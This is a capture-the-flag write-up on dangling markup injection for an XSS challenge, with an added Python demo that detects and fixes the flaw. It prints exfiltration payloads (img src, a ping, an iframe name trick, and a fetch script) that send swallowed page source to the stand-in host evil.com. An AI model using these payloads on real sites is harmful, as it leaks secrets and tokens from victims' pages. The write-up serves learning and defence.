L-CTF 2017 easy xss

Two ways to solve it; both are covered in this writeup.

The key point is how to leak information through the HTML parser (dangling markup injection).

from https://bugs.chromium.org/p/chromium/issues/detail?id=680970

<img src='//evil.com/?p=

Because the attribute value is never closed, the src attribute swallows the rest of the HTML source up to the next single quote ('), and the browser sends all of it to evil.com as part of the request URL.

To make it easier, I use an old Chrome to perform this challenge.

But there are still some tricks to bypass the patch in the stable version.

There are 2 ways:

Needs user interaction

<a ping='//evil.com/?p=

It's hard to use in a real attack, since the ping request is only sent when the victim clicks the link.

Without user interaction

<iframe src='//evil.com/evil.html' name='

evil.html (served from evil.com); the swallowed source ends up in the iframe's name attribute, which the framed document can read as window.name:

<script>
// window.name holds the iframe's name attribute, i.e. the swallowed page source.
// encodeURIComponent replaces the deprecated escape() and keeps the URL valid.
fetch('//evil.com/?p=' + encodeURIComponent(window.name))
</script>

Then we get the leaked source code, which contains the flag.
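To show what the parser actually does with the unclosed attribute in both variants above (the img src and the iframe name), here is an added example that is not part of the original writeup. It uses Python's stdlib html.parser, whose single-quoted attribute handling matches the browser behaviour described: the value runs until the next single quote, newlines and `<` included. The page template, the flag value, the csrf token and the host `evil.example` are constructed for illustration; the `render()` function shows the fix on the defender's side, quote-aware output encoding, and `dangling_sinks()` is a simple detection heuristic that flags attribute values containing a raw newline or `<`.

```python
"""Dangling-markup demo with Python's stdlib HTML parser.
Added example, not code from the original writeup; the page template,
flag, token and the host evil.example are constructed."""
from html import escape
from html.parser import HTMLParser

# Attributes whose value a browser turns into a request (src, ping) or hands
# to another origin (an iframe's name is readable by the framed page as window.name).
SINK_ATTRS = {("img", "src"), ("a", "ping"), ("iframe", "src"), ("iframe", "name")}

# Constructed page template; {comment} is the untrusted, user-supplied part.
PAGE = (
    "<div class=\"comment\">{comment}</div>\n"
    "<p>Secret flag: FLAG{{constructed-sample}}</p>\n"
    "<form><input type='hidden' name='csrf' value='t0k3n'></form>\n"
)


class SinkCollector(HTMLParser):
    """Records the value of every exfiltration-capable attribute it parses."""

    def __init__(self):
        super().__init__()
        self.sinks = []  # list of (tag, attr, value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name) in SINK_ATTRS and value is not None:
                self.sinks.append((tag, name, value))


def collect_sinks(html):
    """Parse the page and return every (tag, attr, value) sink it contains."""
    parser = SinkCollector()
    parser.feed(html)
    parser.close()
    return parser.sinks


def dangling_sinks(html):
    """Sinks whose value swallowed markup. A raw newline or '<' inside an
    attribute value is the signal that the value ran past its own tag."""
    return [s for s in collect_sinks(html) if "\n" in s[2] or "<" in s[2]]


def render(comment, encode=True):
    """Build the page. encode=True is the fix: html.escape(quote=True)
    turns <, >, &, \" and ' into entities, so an attribute can never dangle."""
    body = escape(comment, quote=True) if encode else comment
    return PAGE.format(comment=body)


# The two payload shapes from the writeup, pointed at a constructed host.
IMG_PAYLOAD = "<img src='//evil.example/?p="
IFRAME_PAYLOAD = "<iframe src='//evil.example/evil.html' name='"


def demo():
    """Return (leaked, fixed): sinks found without and with output encoding."""
    leaked = dangling_sinks(render(IMG_PAYLOAD, encode=False))
    fixed = dangling_sinks(render(IMG_PAYLOAD, encode=True))
    return leaked, fixed


if __name__ == "__main__":
    leaked, fixed = demo()
    for tag, attr, value in leaked:
        print(f"unencoded page: {tag}[{attr}] would carry {value!r}")
    print("encoded page:", fixed)
    for tag, attr, value in dangling_sinks(render(IFRAME_PAYLOAD, encode=False)):
        print(f"iframe variant: {tag}[{attr}] = {value!r}")
```

Running it prints the img src value `//evil.example/?p=</div>\n<p>Secret flag: ...<input type=`: the flag is inside the swallowed span, while the csrf token is not, because the next single quote (in `type='hidden'`) terminates the value. With `encode=True` the same input parses as text and no sink is reported, which is the only robust fix; a Content-Security-Policy restricting img-src, frame-src and connect-src limits where a dangling request can go but does not stop the parser from swallowing the markup.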